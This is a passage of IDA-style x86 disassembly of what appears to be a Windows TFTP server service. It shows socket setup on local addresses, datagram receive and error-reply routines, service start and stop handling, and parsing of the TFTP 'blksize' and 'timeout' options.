; ---------------------------------------------------------------------------


loc_1001B11:				; CODE XREF: sub_1001A91+64j
		inc	dword_1005DF0
		push	2FF6Ch
		push	8
		push	dword_1005DEC
		call	dword_100105C+8
		mov	esi, eax
		cmp	esi, ebp
		jz	loc_1001D5E
		push	ebp
		push	ebp
		push	ebp
		push	ebp
		call	dword_1001040	; CreateEventA
		mov	[esi+30h], eax


loc_1001B41:				; CODE XREF: sub_1001A91+7Ej
		push	ebx
		mov	[esp+40h+arg_0], eax
		call	dword_100104C	; RtlLeaveCriticalSection
		lea	ebp, [esi+34h]
		mov	ecx, 3FEFh
		xor	eax, eax
		mov	edi, ebp
		rep stosd
		stosb
		mov	eax, [esp+40h+arg_FFD8]
		mov	[esp+40h+var_1C], ebp
		mov	[esp+40h+var_20], 0FFBDh
		mov	[esp+40h+var_28], 10h
		mov	[esi+1Ch], eax
		lea	eax, [esp+40h+var_10]
		push	0
		push	eax
		lea	eax, [esp+48h+var_28]
		lea	edi, [esi+2Ch]
		push	eax
		lea	eax, [esi+0Ch]
		push	eax
		lea	eax, [esp+50h+var_30]
		push	eax
		push	edi
		lea	eax, [esp+58h+var_20]
		push	1
		push	eax
		push	[esp+60h+arg_FFD4]
		call	dword_1001110	; WSARecvFrom
		mov	[esp+64h+var_48], eax
		mov	ax, [esi+0Eh]
		push	eax
		call	dword_100110C	; ntohs
		cmp	[esp+68h+var_4C], 0
		jz	short loc_1001C34
		call	dword_10010F8	; WSAGetLastError
		cmp	eax, 3E5h
		jnz	loc_1001D2F
		mov	eax, dword_1005DDC
		push	0FFFFFFFFh
		mov	[esp+6Ch+var_40], eax
		mov	eax, [esp+6Ch+var_28]
		mov	[esp+6Ch+var_3C], eax
		lea	eax, [esp+6Ch+var_40]
		push	0
		push	eax
		push	2
		call	dword_100105C+4
		cmp	eax, 0FFFFFFFFh
		jz	loc_1001D2F
		cmp	eax, 102h
		jz	loc_1001D2F
		test	eax, eax
		jz	loc_1001D2F
		lea	eax, [esp+78h+var_68]
		push	eax
		push	0
		lea	eax, [esp+80h+var_48]
		push	edi
		push	eax
		push	[esp+88h+arg_FF9C]
		call	dword_1001108	; WSAGetOverlappedResult
		test	eax, eax
		jnz	short loc_1001C34
		call	dword_10010F8	; WSAGetLastError
		jmp	loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001C34:				; CODE XREF: sub_1001A91+129j
					; sub_1001A91+196j
		push	0
		push	dword_1005DDC
		call	dword_100103C	; WaitForSingleObject
		test	eax, eax
		jz	loc_1001D2F
		cmp	dword ptr [edi], 2
		jl	loc_1001CEA
		xor	edi, edi
		cmp	[esp+70h+arg_FFA8], edi
		jz	short loc_1001CDA
		mov	ax, [ebp+0]
		push	eax
		call	dword_1001104	; ntohs
		movzx	ecx, ax
		test	ecx, ecx
		jle	short loc_1001CB8
		cmp	ecx, 2
		jle	short loc_1001C81
		cmp	ecx, 4
		jz	short loc_1001CB8
		cmp	ecx, 5
		jnz	short loc_1001CB8
		jmp	short loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001C81:				; CODE XREF: sub_1001A91+1E2j
		cmp	ax, 1
		jnz	short loc_1001C94
		inc	dword_10060C4
		mov	edi, offset sub_1002F31
		jmp	short loc_1001CA5
; ---------------------------------------------------------------------------


loc_1001C94:				; CODE XREF: sub_1001A91+1F4j
		cmp	ax, 2
		jnz	short loc_1001CA5
		inc	dword_10060C8
		mov	edi, offset sub_100333A


loc_1001CA5:				; CODE XREF: sub_1001A91+201j
					; sub_1001A91+207j
		mov	eax, [esp+74h+arg_FFA0]
		test	edi, edi
		mov	[esi+8], eax
		jz	short loc_1001CEA
		push	esi
		call	edi ; sub_1002F31
		jmp	short loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001CB8:				; CODE XREF: sub_1001A91+1DDj
					; sub_1001A91+1E7j ...
		push	0
		push	4
		push	[esp+7Ch+arg_FFA0]
		inc	dword_10060CC
		lea	eax, [esp+80h+var_20]
		push	eax
		lea	eax, [esp+84h+var_30]
		push	eax
		call	sub_100230A
		jmp	short loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001CDA:				; CODE XREF: sub_1001A91+1CBj
		mov	eax, [esp+70h+arg_FFA4]
		push	esi
		mov	[esi+8], eax
		call	sub_1002EC8


loc_1001CEA:				; CODE XREF: sub_1001A91+19Ej
					; sub_1001A91+1BCj ...
		push	ebx
		call	dword_1001058	; RtlEnterCriticalSection
		mov	eax, dword_1006078
		mov	dword ptr [esi+4], offset dword_1006078
		mov	[esi], eax
		push	offset dword_1005DE8
		mov	[eax+4], esi
		mov	dword_1006078, esi
		call	dword_100105C	; InterlockedIncrement
		dec	dword_1005DF4
		push	ebx
		call	dword_100104C	; RtlLeaveCriticalSection
		xor	ebp, ebp
		jmp	loc_1001AAA
; ---------------------------------------------------------------------------


loc_1001D27:				; CODE XREF: sub_1001A91+32j
		call	dword_10010F8	; WSAGetLastError
		jmp	short loc_1001D65
; ---------------------------------------------------------------------------


loc_1001D2F:				; CODE XREF: sub_1001A91+136j
					; sub_1001A91+161j ...
		push	ebx
		call	dword_1001058	; RtlEnterCriticalSection
		mov	eax, dword_1006078
		mov	dword ptr [esi+4], offset dword_1006078
		mov	[esi], eax
		push	offset dword_1005DE8
		mov	[eax+4], esi
		mov	dword_1006078, esi
		call	dword_100105C	; InterlockedIncrement
		dec	dword_1005DF4


loc_1001D5E:				; CODE XREF: sub_1001A91+9Dj
		push	ebx
		call	dword_100104C	; RtlLeaveCriticalSection


loc_1001D65:				; CODE XREF: sub_1001A91+3Cj
					; sub_1001A91+29Cj
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		add	esp, 10004h
		retn	8
sub_1001A91	endp ; sp-analysis failed

; ---------------------------------------------------------------------------


loc_1001D74:				; DATA XREF: sub_100188E+2Do
		push	ecx
		push	ebx
		push	ebp
		push	esi
		mov	esi, offset dword_1006020
		push	edi
		mov	edi, dword_1001070
		push	esi
		xor	ebp, ebp
		xor	ebx, ebx
		call	edi ; dword_1001070


loc_1001D8B:				; CODE XREF: seg000:01001DA1j
		test	eax, eax
		jnz	short loc_1001DA7
		push	0C8h
		call	dword_100106C	; Sleep
		push	esi
		call	edi ; dword_1001070
		inc	ebx
		cmp	ebx, 7Dh
		jb	short loc_1001D8B
		test	eax, eax
		jz	short loc_1001DD1


loc_1001DA7:				; CODE XREF: seg000:01001D8Dj
		lea	eax, [esp+10h]
		push	eax
		push	dword ptr [esp+1Ch]
		call	sub_10021E5
		test	eax, eax
		jnz	short loc_1001DC0
		mov	eax, [esp+10h]
		mov	ebp, [eax+0Ch]


loc_1001DC0:				; CODE XREF: seg000:01001DB7j
		push	esi
		call	dword_100104C	; RtlLeaveCriticalSection
		push	ebp
		push	dword ptr [esp+1Ch]
		call	sub_1001A91


loc_1001DD1:				; CODE XREF: seg000:01001DA5j
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		pop	ecx
		retn	8
; ---------------------------------------------------------------------------


loc_1001DDB:				; DATA XREF: sub_100188E:loc_10018C2o
		push	0
		push	dword ptr [esp+8]
		call	sub_1001A91
		xor	eax, eax
		retn	8

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1001DEB	proc near		; DATA XREF: sub_1001665+6o

var_4		= byte ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		lea	eax, [ebp+var_4]
		push	eax
		call	dword_10010A4	; time
		inc	dword_1006134
		pop	ecx
		lea	eax, [ebp+var_4]
		push	eax
		call	dword_10010B8	; ctime
		mov	eax, [ebp+arg_0]
		pop	ecx
		dec	eax
		jz	short loc_1001E68
		dec	eax
		jz	short loc_1001E35
		dec	eax
		jz	short loc_1001E1D
		dec	eax
		dec	eax
		jz	short loc_1001E68
		jmp	short loc_1001E4B
; ---------------------------------------------------------------------------


loc_1001E1D:				; CODE XREF: sub_1001DEB+2Aj
		push	dword_1006040
		call	dword_1001034	; ResumeThread
		mov	dword_1006124, 4
		jmp	short loc_1001E4B
; ---------------------------------------------------------------------------


loc_1001E35:				; CODE XREF: sub_1001DEB+27j
		push	dword_1006040
		call	dword_1001074	; SuspendThread
		mov	dword_1006124, 7


loc_1001E4B:				; CODE XREF: sub_1001DEB+30j
					; sub_1001DEB+48j
		push	offset dword_1006120
		push	dword_1006044
		call	dword_1001014	; SetServiceStatus
		test	eax, eax
		jnz	short locret_1001E6F
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	short locret_1001E6F
; ---------------------------------------------------------------------------


loc_1001E68:				; CODE XREF: sub_1001DEB+24j
					; sub_1001DEB+2Ej
		push	0
		call	sub_1001E73

locret_1001E6F:				; CODE XREF: sub_1001DEB+73j
					; sub_1001DEB+7Bj
		leave
		retn	4
sub_1001DEB	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001E73	proc near		; CODE XREF: sub_1001665+B9p
					; sub_1001DEB+7Fp

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		mov	esi, dword_1001014
		push	edi
		mov	edi, offset dword_1006120
		push	edi
		mov	dword_1006124, 3
		push	dword_1006044
		call	esi ; dword_1001014
		mov	ebp, dword_1001038
		xor	ebx, ebx
		cmp	eax, ebx
		jnz	short loc_1001EA3
		call	ebp ; dword_1001038


loc_1001EA3:				; CODE XREF: sub_1001E73+2Cj
		push	dword_1005DDC
		call	dword_1001030	; SetEvent
		mov	dword_1006124, 1
		mov	dword_1006134, ebx
		mov	eax, [esp+10h+arg_0]
		mov	dword_1006138, ebx
		cmp	eax, ebx
		jnz	short loc_1001EDB
		mov	dword_100612C, ebx
		mov	dword_1006130, ebx
		jmp	short loc_1001EFD
; ---------------------------------------------------------------------------


loc_1001EDB:				; CODE XREF: sub_1001E73+58j
		cmp	eax, 834h
		jb	short loc_1001EF3
		cmp	eax, 16A7h
		mov	dword_100612C, 42Ah
		jbe	short loc_1001EF8


loc_1001EF3:				; CODE XREF: sub_1001E73+6Dj
		mov	dword_100612C, eax


loc_1001EF8:				; CODE XREF: sub_1001E73+7Ej
		mov	dword_1006130, eax


loc_1001EFD:				; CODE XREF: sub_1001E73+66j
		push	edi
		push	dword_1006044
		call	esi ; dword_1001014
		cmp	eax, ebx
		jnz	short loc_1001F0C
		call	ebp ; dword_1001038


loc_1001F0C:				; CODE XREF: sub_1001E73+95j
		mov	eax, dword_1005DE0
		mov	esi, dword_1001054
		cmp	eax, ebx
		jz	short loc_1001F24
		push	eax
		call	esi ; dword_1001054
		mov	dword_1005DE0, ebx


loc_1001F24:				; CODE XREF: sub_1001E73+A6j
		mov	eax, dword_1005DDC
		cmp	eax, ebx
		jz	short loc_1001F36
		push	eax
		call	esi ; dword_1001054
		mov	dword_1005DDC, ebx


loc_1001F36:				; CODE XREF: sub_1001E73+B8j
		mov	eax, dword_1005DD0
		cmp	eax, ebx
		jz	short loc_1001F4D
		push	eax
		call	dword_100109C	; fclose
		pop	ecx
		mov	dword_1005DD0, ebx


loc_1001F4D:				; CODE XREF: sub_1001E73+CAj
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn	4
sub_1001E73	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001F54	proc near		; CODE XREF: sub_1002182+1Cp
					; sub_1002219+B7p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	0FFFFFFFFh
		push	dword ptr [esi+10h]
		call	dword_1001168	; RtlDeregisterWaitEx
		push	dword ptr [esi+8]
		call	dword_100111C	; closesocket
		push	dword ptr [esi+14h]
		call	dword_1001118	; WSACloseEvent
		mov	eax, [esi]
		mov	ecx, [esi+4]
		cmp	eax, ecx
		jnz	short loc_1001F90
		mov	eax, dword_1006038
		mov	ecx, [eax]
		mov	eax, [eax+4]
		mov	[eax], ecx
		mov	[ecx+4], eax
		jmp	short loc_1001F9A
; ---------------------------------------------------------------------------


loc_1001F90:				; CODE XREF: sub_1001F54+29j
		mov	[ecx], eax
		mov	eax, [esi]
		mov	ecx, [esi+4]
		mov	[eax+4], ecx


loc_1001F9A:				; CODE XREF: sub_1001F54+3Aj
		push	esi
		call	dword_10010A0	; free
		pop	ecx
		pop	esi
		retn	4
sub_1001F54	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1001FA6	proc near		; CODE XREF: sub_10018DB+3Dp
					; sub_1002219+1Dp

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		mov	ebx, [ebp+arg_0]
		push	esi
		push	edi
		xor	edi, edi
		lea	eax, [ebp+var_4]
		push	edi
		push	eax
		push	edi
		mov	[ebp+var_4], edi
		mov	[ebp+var_8], 0C0000017h
		mov	[ebx], edi
		call	sub_1003A4A	; GetIpAddrTable
		cmp	eax, edi
		jz	short loc_1001FD3
		cmp	eax, 7Ah
		jnz	short loc_100201A


loc_1001FD3:				; CODE XREF: sub_1001FA6+26j
		push	[ebp+var_4]
		call	dword_1001094	; malloc
		mov	esi, eax
		pop	ecx
		cmp	esi, edi
		jz	short loc_100201A


loc_1001FE3:				; CODE XREF: sub_1001FA6+63j
		lea	eax, [ebp+var_4]
		push	edi
		push	eax
		push	esi
		call	sub_1003A4A	; GetIpAddrTable
		cmp	eax, edi
		jz	short loc_1002015
		cmp	eax, 7Ah
		jnz	short loc_100201A
		push	[ebp+var_4]
		push	esi
		call	dword_1001098	; realloc
		pop	ecx
		cmp	eax, edi
		pop	ecx
		jz	short loc_100200B
		mov	esi, eax
		jmp	short loc_1001FE3
; ---------------------------------------------------------------------------


loc_100200B:				; CODE XREF: sub_1001FA6+5Fj
		push	esi
		call	dword_10010A0	; free
		pop	ecx
		jmp	short loc_100201A
; ---------------------------------------------------------------------------


loc_1002015:				; CODE XREF: sub_1001FA6+4Aj
		mov	[ebp+var_8], edi
		mov	[ebx], esi


loc_100201A:				; CODE XREF: sub_1001FA6+2Bj
					; sub_1001FA6+3Bj ...
		mov	eax, [ebp+var_8]
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	4
sub_1001FA6	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002024	proc near		; CODE XREF: sub_100205A+B7p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	[esp+arg_0]
		call	dword_1001120	; inet_ntoa
		test	eax, eax
		jz	short locret_1002057
		push	edi
		mov	edi, eax
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		push	esi
		mov	eax, ecx
		mov	esi, edi
		mov	edi, [esp+8+arg_4]
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		pop	esi
		pop	edi

locret_1002057:				; CODE XREF: sub_1002024+Cj
		retn	8
sub_1002024	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100205A	proc near		; CODE XREF: sub_10018DB+64p
					; sub_1002219+65p ...

var_28		= byte ptr -28h
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		push	ebx
		push	esi
		xor	esi, esi
		push	edi
		mov	[ebp+var_4], esi


loc_1002068:				; CODE XREF: sub_100205A+5Dj
		push	1
		push	esi
		push	esi
		push	esi
		push	2
		push	2
		call	dword_10010F4	; WSASocketA
		mov	ebx, eax
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_100209D
		xor	eax, eax
		lea	edi, [ebp+var_14]
		stosd
		stosd
		stosd
		push	offset aUdp	; "udp"
		push	offset aTftp	; "tftp"
		stosd
		call	dword_1001128	; getservbyname
		cmp	eax, esi
		jnz	short loc_10020B9
		jmp	short loc_10020B1
; ---------------------------------------------------------------------------


loc_100209D:				; CODE XREF: sub_100205A+22j
		call	dword_10010F8	; WSAGetLastError
		push	2EEh
		call	dword_100106C	; Sleep
		inc	[ebp+var_4]


loc_10020B1:				; CODE XREF: sub_100205A+41j
		cmp	[ebp+var_4], 0Ah
		jge	short loc_10020E6
		jmp	short loc_1002068
; ---------------------------------------------------------------------------


loc_10020B9:				; CODE XREF: sub_100205A+3Fj
		mov	[ebp+var_14], 2
		mov	ax, [eax+8]
		mov	[ebp+var_12], ax
		mov	eax, [ebp+arg_0]
		mov	[ebp+var_10], eax
		lea	eax, [ebp+var_14]
		push	10h
		push	eax
		push	ebx
		call	dword_1001124	; bind
		test	eax, eax
		jz	short loc_10020E6
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	short loc_100215E
; ---------------------------------------------------------------------------


loc_10020E6:				; CODE XREF: sub_100205A+5Bj
					; sub_100205A+82j
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_100215E
		push	20h
		call	dword_1001094	; malloc
		mov	esi, eax
		pop	ecx
		test	esi, esi
		jz	short loc_100213D
		push	8
		xor	eax, eax
		pop	ecx
		mov	edi, esi
		rep stosd
		mov	eax, [ebp+arg_0]
		lea	ecx, [ebp+var_28]
		push	ecx
		push	eax
		mov	[esi+8], ebx
		mov	[esi+0Ch], eax
		call	sub_1002024
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	dword_1001040	; CreateEventA
		mov	edi, eax
		test	edi, edi
		jz	short loc_1002140
		push	1
		push	edi
		push	ebx
		mov	[esi+14h], edi
		call	sub_100188E
		test	eax, eax
		mov	[esi+10h], eax
		jnz	short loc_1002162
		jmp	short loc_1002140
; ---------------------------------------------------------------------------


loc_100213D:				; CODE XREF: sub_100205A+9Ej
		mov	edi, [ebp+arg_0]


loc_1002140:				; CODE XREF: sub_100205A+CCj
					; sub_100205A+E1j
		push	ebx
		call	dword_100111C	; closesocket
		test	edi, edi
		jz	short loc_1002152
		push	edi
		call	dword_1001054	; CloseHandle


loc_1002152:				; CODE XREF: sub_100205A+EFj
		test	esi, esi
		jz	short loc_100215E
		push	esi
		call	dword_10010A0	; free
		pop	ecx


loc_100215E:				; CODE XREF: sub_100205A+8Aj
					; sub_100205A+8Fj ...
		xor	eax, eax
		jmp	short loc_100217B
; ---------------------------------------------------------------------------


loc_1002162:				; CODE XREF: sub_100205A+DFj
		mov	eax, dword_1006038
		mov	dword ptr [esi+4], offset dword_1006038
		mov	[esi], eax
		mov	[eax+4], esi
		mov	dword_1006038, esi
		mov	eax, esi


loc_100217B:				; CODE XREF: sub_100205A+106j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	4
sub_100205A	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002182	proc near		; CODE XREF: sub_1002219:loc_1002298p
		mov	ecx, dword_1006038
		push	esi
		mov	esi, offset dword_1006038
		xor	eax, eax
		cmp	ecx, esi
		jz	short loc_10021B3
		push	edi


loc_1002195:				; CODE XREF: sub_1002182+2Ej
		cmp	dword ptr [ecx+18h], 0
		mov	edi, [ecx]
		jnz	short loc_10021A8
		push	ecx
		call	sub_1001F54
		push	1
		pop	eax
		jmp	short loc_10021AC
; ---------------------------------------------------------------------------


loc_10021A8:				; CODE XREF: sub_1002182+19j
		and	dword ptr [ecx+18h], 0


loc_10021AC:				; CODE XREF: sub_1002182+24j
		cmp	edi, esi
		mov	ecx, edi
		jnz	short loc_1002195
		pop	edi


loc_10021B3:				; CODE XREF: sub_1002182+10j
		pop	esi
		retn
sub_1002182	endp


; =============== S U B	R O U T	I N E =======================================



sub_10021B5	proc near		; CODE XREF: sub_1002219+43p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	edx, [esp+arg_4]
		push	esi
		mov	ecx, offset dword_1006038
		and	dword ptr [edx], 0
		mov	eax, dword_1006038


loc_10021C7:				; CODE XREF: sub_10021B5+21j
		cmp	eax, ecx
		jz	short loc_10021DF
		mov	esi, [eax+0Ch]
		cmp	esi, [esp+4+arg_0]
		jz	short loc_10021D8
		mov	eax, [eax]
		jmp	short loc_10021C7
; ---------------------------------------------------------------------------


loc_10021D8:				; CODE XREF: sub_10021B5+1Dj
		push	1
		mov	[edx], eax
		pop	eax
		jmp	short loc_10021E1
; ---------------------------------------------------------------------------


loc_10021DF:				; CODE XREF: sub_10021B5+14j
		xor	eax, eax


loc_10021E1:				; CODE XREF: sub_10021B5+28j
		pop	esi
		retn	8
sub_10021B5	endp


; =============== S U B	R O U T	I N E =======================================



sub_10021E5	proc near		; CODE XREF: seg000:01001DB0p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	edx, [esp+arg_4]
		push	esi
		mov	ecx, offset dword_1006038
		and	dword ptr [edx], 0
		mov	eax, dword_1006038


loc_10021F7:				; CODE XREF: sub_10021E5+21j
		cmp	eax, ecx
		jz	short loc_100220A
		mov	esi, [eax+8]
		cmp	esi, [esp+4+arg_0]
		jz	short loc_1002208
		mov	eax, [eax]
		jmp	short loc_10021F7
; ---------------------------------------------------------------------------


loc_1002208:				; CODE XREF: sub_10021E5+1Dj
		mov	[edx], eax


loc_100220A:				; CODE XREF: sub_10021E5+14j
		mov	eax, [edx]
		pop	esi
		neg	eax
		sbb	eax, eax
		and	al, 0A9h
		add	eax, 57h
		retn	8
sub_10021E5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1002219	proc near		; DATA XREF: sub_10018DB+CBo

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		push	ebx
		push	esi
		push	edi
		xor	esi, esi
		push	offset dword_1006020
		mov	[ebp+var_C], esi
		call	dword_1001058	; RtlEnterCriticalSection
		lea	eax, [ebp+var_4]
		push	eax
		call	sub_1001FA6
		test	eax, eax
		jnz	short loc_10022A9
		mov	eax, [ebp+var_4]
		xor	ebx, ebx
		cmp	[eax], esi
		jbe	short loc_1002298


loc_1002248:				; CODE XREF: sub_1002219+7Dj
		mov	eax, [eax+esi+4]
		test	eax, eax
		jz	short loc_100228D
		cmp	eax, 100007Fh
		jz	short loc_100228D
		lea	ecx, [ebp+var_8]
		push	ecx
		push	eax
		call	sub_10021B5
		test	eax, eax
		jz	short loc_1002271
		mov	eax, [ebp+var_8]
		mov	dword ptr [eax+18h], 1
		jmp	short loc_100228D
; ---------------------------------------------------------------------------


loc_1002271:				; CODE XREF: sub_1002219+4Aj
		mov	eax, [ebp+var_4]
		push	1
		pop	edi
		push	dword ptr [eax+esi+4]
		mov	[ebp+var_C], edi
		call	sub_100205A
		test	eax, eax
		mov	[ebp+var_8], eax
		jz	short loc_100228D
		mov	[eax+18h], edi


loc_100228D:				; CODE XREF: sub_1002219+35j
					; sub_1002219+3Cj ...
		mov	eax, [ebp+var_4]
		inc	ebx
		add	esi, 18h
		cmp	ebx, [eax]
		jb	short loc_1002248


loc_1002298:				; CODE XREF: sub_1002219+2Dj
		call	sub_1002182
		push	[ebp+var_4]
		mov	esi, eax
		call	dword_10010A0	; free
		pop	ecx


loc_10022A9:				; CODE XREF: sub_1002219+24j
		cmp	[ebp+var_C], 0
		jnz	short loc_10022E9
		test	esi, esi
		jnz	short loc_10022E9
		mov	eax, dword_1006038
		mov	edi, offset dword_1006038
		cmp	eax, edi
		jz	short loc_10022E9


loc_10022C1:				; CODE XREF: sub_1002219+CEj
		mov	[ebp+var_8], eax
		mov	ebx, [eax]
		test	byte ptr [eax+1Ch], 1
		jnz	short loc_10022E3
		mov	esi, [eax+0Ch]
		push	eax
		call	sub_1001F54
		push	esi
		call	sub_100205A
		test	eax, eax
		jz	short loc_10022E3
		or	dword ptr [eax+1Ch], 1


loc_10022E3:				; CODE XREF: sub_1002219+B1j
					; sub_1002219+C4j
		cmp	ebx, edi
		mov	eax, ebx
		jnz	short loc_10022C1


loc_10022E9:				; CODE XREF: sub_1002219+94j
					; sub_1002219+98j ...
		push	offset dword_1006100
		push	offset dword_1005E00
		call	sub_1003A44	; NotifyAddrChange
		push	offset dword_1006020
		call	dword_100104C	; RtlLeaveCriticalSection
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	8
sub_1002219	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100230A	proc near		; CODE XREF: sub_1001A91+242p
					; sub_10023D8+23Cp ...

var_FFBC	= word ptr -0FFBCh
var_FFBA	= word ptr -0FFBAh
var_FFB8	= byte ptr -0FFB8h
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		mov	eax, 0FFBCh
		call	sub_1003A3E	; _chkstk
		push	ebx
		push	esi
		mov	esi, dword_1001104
		push	edi
		push	5
		call	esi ; dword_1001104
		mov	edi, [ebp+arg_C]
		mov	[ebp+var_FFBC],	ax
		push	edi
		call	esi ; dword_1001104
		cmp	[ebp+arg_10], 0
		mov	[ebp+var_FFBA],	ax
		jz	short loc_1002369
		mov	edi, [ebp+arg_10]
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		lea	edx, [ebp+var_FFB8]
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, edx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		mov	edi, [ebp+arg_10]
		jmp	short loc_10023A2
; ---------------------------------------------------------------------------


loc_1002369:				; CODE XREF: sub_100230A+32j
		cmp	di, 9
		jb	short loc_1002371
		xor	edi, edi


loc_1002371:				; CODE XREF: sub_100230A+63j
		movzx	eax, di
		or	ecx, 0FFFFFFFFh
		lea	ebx, [ebp+var_FFB8]
		mov	edx, off_1005CC0[eax*4]
		xor	eax, eax
		mov	edi, edx
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		mov	edi, edx


loc_10023A2:				; CODE XREF: sub_100230A+5Dj
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		push	10h
		push	[ebp+arg_0]
		not	ecx
		dec	ecx
		push	eax
		add	ecx, 5
		lea	eax, [ebp+var_FFBC]
		push	ecx
		push	eax
		push	[ebp+arg_8]
		call	dword_1001130	; sendto
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_10023D1
		call	dword_10010F8	; WSAGetLastError


loc_10023D1:				; CODE XREF: sub_100230A+BFj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	14h
sub_100230A	endp


; =============== S U B	R O U T	I N E =======================================



sub_10023D8	proc near		; CODE XREF: sub_1002F31+302p
					; sub_100333A+26Dp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h
arg_10		= dword	ptr  14h
arg_14		= dword	ptr  18h

		mov	eax, [esp+arg_0]
		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_10]
		mov	dword ptr [eax+20h], 200h
		mov	dword ptr [eax+28h], 0Ah
		mov	eax, [esp+0Ch+arg_14]
		push	edi
		mov	ecx, 3FEFh
		and	dword ptr [eax], 0
		xor	eax, eax
		mov	edi, esi
		push	6
		rep stosd
		call	dword_1001104	; ntohs
		mov	[esi], ax
		lea	ebx, [esi+2]
		mov	ebp, [esp+10h+arg_4]
		cmp	byte ptr [ebp+0], 0
		jz	loc_10025E4


loc_1002420:				; CODE XREF: sub_10023D8+202j
		mov	esi, dword_100115C
		push	offset aBlksize	; "blksize"
		push	ebp
		call	esi ; dword_100115C
		pop	ecx
		test	eax, eax
		pop	ecx
		jnz	short loc_1002498
		mov	edi, ebp
		or	ecx, 0FFFFFFFFh
		repne scasb
		not	ecx
		sub	edi, ecx
		push	8
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		pop	esi
		add	ebp, esi
		add	ebx, esi
		push	ebp
		call	dword_1001160	; atoi
		pop	ecx
		cmp	eax, esi
		mov	ecx, [esp+10h+arg_0]
		mov	[ecx+20h], eax
		jb	loc_10025FD
		cmp	eax, 0FFB8h
		ja	loc_10025FD
		cmp	eax, 5B0h
		jnz	short loc_100248F
		mov	dword ptr [ecx+20h], 200h
		sub	ebx, esi
		jmp	loc_10025C6
; ---------------------------------------------------------------------------


loc_100248F:				; CODE XREF: sub_10023D8+A7j
		push	0Ah
		push	ebx
		push	eax
		jmp	loc_1002597
; ---------------------------------------------------------------------------


loc_1002498:				; CODE XREF: sub_10023D8+5Aj
		push	offset aTimeout_0 ; "timeout"
		push	ebp
		call	esi ; dword_100115C
		pop	ecx
		test	eax, eax
		pop	ecx
		jnz	short loc_100251A
		mov	edi, ebp
		or	ecx, 0FFFFFFFFh
		repne scasb
		not	ecx
		sub	edi, ecx
		add	ebp, 8
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		push	ebp
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		add	ebx, 8
		and	ecx, 3
		rep movsb
		call	dword_1001160	; atoi
		pop	ecx
		mov	ecx, [esp+10h+arg_0]
		push	1
		pop	edx
		cmp	eax, edx
		mov	[ecx+28h], eax
		jl	loc_1002602
		cmp	eax, 0FFh
		jg	loc_1002602
		mov	eax, [esp+10h+arg_14]
		mov	edi, ebp
		or	ecx, 0FFFFFFFFh
		mov	[eax], edx
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		mov	edi, ebp
		jmp	loc_10025A2
; ---------------------------------------------------------------------------


